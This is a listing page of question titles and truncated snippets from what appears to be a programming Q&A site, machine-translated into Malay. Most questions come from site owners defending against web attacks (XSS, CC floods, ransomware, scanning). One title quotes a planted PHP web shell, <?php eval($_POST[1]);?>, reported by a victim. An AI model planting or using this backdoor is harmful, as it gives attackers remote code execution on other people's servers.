nginx - Soalan tentang menggunakan ejen pengguna untuk menyerang

Hari ini saya secara tidak sengaja mendapati bahawa terdapat log yang sangat pelik dalam access.log nginx pada pelayan syarikat: {code...} Bahagian paling pelik ialah: http1.0 user-agent digunakan, iaitu skrip yang saya cari dalam talian dan mendapati saya tidak menemui sebarang maklumat tentang men...

世界只因有你 2017-05-16 17:10:16 0  3  691

Bagaimana untuk menghalang serangan XSS apabila laravel menggunakan {!!content!!}?

Secara amnya, {{$article->title}} digunakan, tetapi kadangkala terdapat format, jadi ini diperlukan: {!!$article->body!!}, tetapi ini akan membawa kepada serangan xss, bagaimana untuk menanganinya untuk mengelakkan serangan xss?

習慣沉默 2017-05-16 16:48:38 0  1  715

Laman web diserang CC Apache mati dalam masa 3 saat selepas dimulakan dan memori melimpah.

Laman web diserang CC Apache mati dalam masa 3 saat selepas dimulakan dan memori melimpah.

Time 2018-10-05 21:18:17 0  3  1347

Bagaimana untuk mendapatkan pembolehubah global unsur untuk mengelakkan tercemar?

var ele=document.getElementById('btn'); Semasa menulis js asli, anda perlu mendapatkan sejumlah besar elemen halaman Sekarang kerana terdapat terlalu banyak pembolehubah global, bagaimana anda mengelak daripada tercemar?

曾经蜡笔没有小新 2017-05-19 10:11:18 0  4  620

javascript - Bagaimana untuk mengelakkan pertindihan dengan data dalam perpustakaan apabila memasukkan data dalam mysql?

Bagaimana untuk mengelakkan pertindihan data yang telah dimasukkan semasa memasukkan data ke dalam jadual pangkalan data mysql? Apa yang perlu saya lakukan?

给我你的怀抱 2017-05-24 11:33:09 0  3  737

javascript - Warisan JS, bagaimana untuk mengelakkan situasi di mana atribut jenis objek prototaip kelas induk akan dipengaruhi oleh subkelas;

Ibu bapa ialah kelas induk, dan anak mewarisi ibu bapa Apabila nilai jantina bagi contoh anak diubah, ia akan menyebabkan jantina ibu bapa dan contoh subkelas lain berubah sama ada atribut jenis objek tersebut hanya boleh diletakkan dalam pembina; atau sama ada ia dipersetujui Membenarkan pengubahsu...

过去多啦不再A梦 2017-06-30 09:59:00 0  4  935

Bagaimanakah anda mendapat kod pengesahan? Adakah anda tidak memerlukan komposer untuk memasang pek pengembangan. Saya terkejut apabila saya menonton video guru.

Bagaimanakah anda mendapat kod pengesahan? Adakah anda tidak memerlukan komposer untuk memasang pek pengembangan. Saya terkejut apabila saya menonton video guru.

phpcn_u32235 2017-09-26 11:00:01 0  1  963

javascript - Dalam vue, mengapa nilai output oleh console.log dipengaruhi oleh kenyataan selepas console.log, dan bagaimana untuk mengelakkan kesan ini

Dalam vue, mengapakah output nilai oleh console.log(a) dipengaruhi oleh pernyataan selepas console.log(a) Bagaimana untuk mengelakkan kesan ini, secara logiknya, output nilai oleh console.log dua kali sepatutnya berbeza? adakah ia sama? Hanya dua nilai keluaran tidak boleh mengganggu antara satu sam...

欧阳克 2017-06-15 09:22:41 0  4  1343

java - Untuk mengelakkan hubungan satu-ke-banyak-ke-banyak yang kompleks dalam pangkalan data, saya mereka pangkalan data tanpa kunci asing Adakah ini mungkin?

Untuk mengelakkan hubungan satu-ke-banyak-ke-banyak yang kompleks dalam pangkalan data, saya mereka pangkalan data supaya medan dalam jadual tidak mempunyai kunci asing, dan perhubungan itu berkaitan secara manual menggunakan penetap dan pengambil menulis program, fungsi itu boleh dilaksanakan, teta...

为情所困 2017-05-17 10:08:09 0  5  582

Laman web telah digodam. Sila beritahu saya bagaimana untuk menyulitkan kandungan datebase.php.

Serangan perisian tebusan tapak web sepatutnya menjadi serangan umum, kerana ia adalah tapak web yang sedang dibangunkan, dan hanya dua orang yang log masuk. Menyemak log, penyerang hanya melakukannya beberapa kali, kemudian masuk, memadam pangkalan data dan menggantikannya dengan maklumat tebusan. ...

言茗℡¹³⁹⁰⁶⁰⁵⁶⁰³⁶ 2020-10-31 15:26:42 1  4  1247

nginx telah menyediakan senarai hitam IP Senarai ini sangat panjang. Terdapat beribu-ribu penyertaan pada masa ini.

Kerana diserang oleh IP dinamik, saya menambah senarai hitam IP nginx (menafikan IP) melalui skrip Ia telah mencapai ribuan senarai hitam ini Saya tertanya-tanya jika ia akan menjejaskan prestasi akses biasa.

过去多啦不再A梦 2017-05-16 17:17:23 0  2  770

javascript - Pada peranti mudah alih, tatal skrin dengan cepat dan kemudian klik untuk menghentikan penatalan Bagaimana untuk mengelak daripada menyentuh teg <a> secara tidak sengaja dan melompat ke halaman lain apabila mengklik?

1 Soalan: Jika anda menatal skrin dengan cepat pada peranti mudah alih dan kemudian mengklik untuk menghentikan penatalan, bagaimana anda boleh mengelak daripada menyentuh teg secara tidak sengaja dan melompat ke halaman lain apabila mengklik? 2 Ini juga merupakan masalah yang sebenarnya dihadapi da...

我想大声告诉你 2017-05-24 11:36:49 0  3  863

Program laman web telah diceroboh oleh Trojan [<?php eval($_POST[1]);?> ok].

Laman web ini sering diserang oleh penggodam baru-baru ini Kami meminta bantuan daripada pakar PHP untuk menjelaskan pemikiran kami supaya kami dapat mencari kelemahan secepat mungkin dan menyelesaikan kebimbangan kami! Kejadian tersebut diterangkan seperti berikut: 1. Laman web ini dibina menggunak...

伊谢尔伦 2017-06-26 10:48:58 0  5  2535

php - Analisis contoh khusus suntikan sql dan xss

Laman web saya telah diserang sebulan yang lalu, dan hari ini saya menerima laporan pengesanan kerentanan daripada 360. Ya Tuhanku, 360 masih melakukan perkara seperti ini? Pautan kerentanan suntikan SQL 1: http://xxx.com:80/index.php?alias=message&action=comment?comment-diary-id=1&com...

高洛峰 2017-06-13 09:22:07 0  3  1945

Bagaimana untuk menyembunyikan nombor versi nginx dan nombor versi PHP dalam pengepala?

Sebagai contoh, bagaimana untuk menyembunyikan nombor versi nginx dan nombor versi PHP dalam pengepala? Untuk mengelakkan serangan pengimbasan berniat jahat tertentu.

伊谢尔伦 2017-05-16 17:25:55 0  2  767

nginx - Jika terdapat tapak web dengan bahagian hadapan dan belakang yang berasingan yang menggunakan perkhidmatan CDN dinamik (seperti TV Laman Web, Accelerator), bagaimanakah permintaan dinamik pengguna (log masuk, penyerahan) dihantar ke pelayan sebenar?

Dikatakan bahawa perkhidmatan seperti 360 Website TV dan Accelerator boleh menyembunyikan IP sebenar Ini adalah perkara yang baik untuk webmaster yang sering diserang oleh DDOS. Tetapi saya masih belum memahaminya. Adakah boleh jika tapak web saya mempunyai bahagian hadapan dan belakang yang berasin...

ringa_lee 2017-05-16 17:14:33 0  3  668

VueJS axios membenarkan untuk mengklik butang sekali sahaja dan membenarkan klik kedua selepas menerima data

Saya sedang membuat sistem suka/tidak suka pada Laravel/VueJS. Sistem saya berfungsi, tetapi saya ingin mengelakkan spammer. Butang suka: <av-on:click="like(10,$event)"><iclass="fasfa-heart"></i></a>10 ialah postid, yang dijana dalam laravelBlade .. ini ad...

P粉938936304 2024-02-26 11:44:47 0  2  514

linux - Pelayan sedang diserang, bagaimana untuk memadam sepenuhnya fail yang tidak diketahui

{kod...} Kemudian saya menyemak status cpu {kod...} {kod...} {kod...} {kod...}

PHP中文网 2017-06-29 10:09:52 0  3  1043

Adakah realistik untuk memanggil keseluruhan tapak secara tidak segerak tanpa menghasilkan HTML statik?

Jika untuk tapak web, semua data di bahagian hadapan dan bahagian belakang dilengkapkan menggunakan interaksi tak segerak ajax, adakah ia realistik? Saya tidak pernah melakukan projek besar, saya hanya seorang pemula, dan saya tidak tahu overhed pelayan HTML statik dan interaksi dinamik tapak penuh....

鸿运达 2019-05-30 17:34:54 0  0  1225

Bagaimana untuk melindungi butang klik untuk berbual Whatsapp daripada pengikisan web bot?

Saya menjalankan tapak web terperingkat di mana orang ramai boleh menghantar item mereka dan orang lain boleh menghubungi mereka melalui Whatsapp untuk mendapatkan butiran lanjut. Hari ini tapak web saya diserang dan saya melihat sejumlah besar klik pautan pada butang Whatsapp dalam Google Analitis,...

P粉786800174 2023-09-03 12:52:21 0  1  632